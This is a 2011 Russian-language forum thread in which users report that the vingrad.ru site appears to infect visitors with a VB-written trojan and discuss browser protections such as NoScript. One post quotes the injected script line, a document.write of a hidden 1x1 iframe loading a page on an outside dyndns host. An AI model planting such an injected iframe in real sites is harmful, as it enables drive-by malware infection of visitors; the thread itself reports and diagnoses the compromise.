Vingrad заражён?

Модератор: Хакер

Хакер
Телепат
Телепат
Аватара пользователя
 
Сообщения: 16473
Зарегистрирован: 13.11.2005 (Вс) 2:43
Откуда: Казахстан, Петропавловск

Vingrad заражён?

Сообщение Хакер » 30.03.2011 (Ср) 4:05

Зашёл на в одну тему на форуме vingrad.ru.
FireFox показал вверху страницы полоску «Для отображения всего мультимедийного контекта этой страницы требуются дополнительные плагины». Сам же файрфокс потерял фокус, а окно GOM Player-а вышло на передний план.

Через некоторое время зловред был уложен DEP-ом:
ving_dep.PNG


Это Trojan.Win32.VBKrypt.clkc. Написан на VB, упакован UPX-ом.
—We separate their smiling faces from the rest of their body, Captain.
—That's right! We decapitate them.

Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя
 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Vingrad заражён?

Сообщение Proxy » 30.03.2011 (Ср) 6:41

WOT уже оценивает vingrad.ru неудовлетворительно по "заслуживает доверия"
Follow the white rabbit.

iGrok
Артефакт VBStreets
Артефакт VBStreets
 
Сообщения: 4272
Зарегистрирован: 10.05.2007 (Чт) 16:11
Откуда: Сетевое сознание

Re: Vingrad заражён?

Сообщение iGrok » 30.03.2011 (Ср) 7:27

Заражён, да. Причём достаточно давно. Это с вирусом оттуда я играл в "кто быстрее", вырубая яву, как только появилось окошко.
Там целый пакет эксплоитов стоит, на разные дыры в разных браузерах. Скорей всего в скрытом фрейме.
label:
cli
jmp label

Хакер
Телепат
Телепат
Аватара пользователя
 
Сообщения: 16473
Зарегистрирован: 13.11.2005 (Вс) 2:43
Откуда: Казахстан, Петропавловск

Re: Vingrad заражён?

Сообщение Хакер » 30.03.2011 (Ср) 7:28

Они (тамошняя администрация) не знают или не знают что с этим делать?
—We separate their smiling faces from the rest of their body, Captain.
—That's right! We decapitate them.

iGrok
Артефакт VBStreets
Артефакт VBStreets
 
Сообщения: 4272
Зарегистрирован: 10.05.2007 (Чт) 16:11
Откуда: Сетевое сознание

Re: Vingrad заражён?

Сообщение iGrok » 30.03.2011 (Ср) 8:01

Хакер писал(а):Они (тамошняя администрация) не знают или не знают что с этим делать?

Этого я не знаю. Я там даже не зареген, только статьи читаю иногда.

Вот бяка:
Код: Выделить всё
document.write(' <iframe src="http://hiuopertik.dyndns.org/j7yfdaq/ancnhpdveljn.php?n=dunner" width="1" height="1" frameborder="0"></iframe> ');

Лежит в http://vingrad.ru/js/main.js, видно только под фоксой.
Для оперы, видимо, используется что-то другое. Не хочу сейчас открывать страницу и опять гоняться с ними..
label:
cli
jmp label

BV
Thinker
Thinker
Аватара пользователя
 
Сообщения: 3987
Зарегистрирован: 12.09.2004 (Вс) 0:55
Откуда: Молдавия, г. Кишинёв

Re: Vingrad заражён?

Сообщение BV » 30.03.2011 (Ср) 11:53

Кинул ссылочку одному из админов. С винградом всегда весело.
У меня AdBlock режет все сторонние скрипты, так что с вирусом не сталкивался
const char *out = "|*0>78-,+<|"; size_t cc = char_traits<char>::length(out);
for (size_t i=0;i<cc;i++){cout<<static_cast<char>((out[i]^89));}cout<<endl;

Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя
 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Vingrad заражён?

Сообщение Proxy » 30.03.2011 (Ср) 14:41

BV писал(а):У меня AdBlock режет все сторонние скрипты, так что с вирусом не сталкивался

AdBlock? Он не отреагировал, он вроде бы только на рекламу нацелен, отреагировал только NoScript. Ну и WOT оповещает (больше он ничего не умеет).
Follow the white rabbit.

BV
Thinker
Thinker
Аватара пользователя
 
Сообщения: 3987
Зарегистрирован: 12.09.2004 (Вс) 0:55
Откуда: Молдавия, г. Кишинёв

Re: Vingrad заражён?

Сообщение BV » 30.03.2011 (Ср) 20:49

Написал AdBlock, а имел ввиду, конечно, связку NoScript + AdBlock. Просто для меня это уже настолько привычная связка, что вот стал не замечать, как называю одним :)
const char *out = "|*0>78-,+<|"; size_t cc = char_traits<char>::length(out);
for (size_t i=0;i<cc;i++){cout<<static_cast<char>((out[i]^89));}cout<<endl;


Вернуться в Мой блог

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 4

    TopList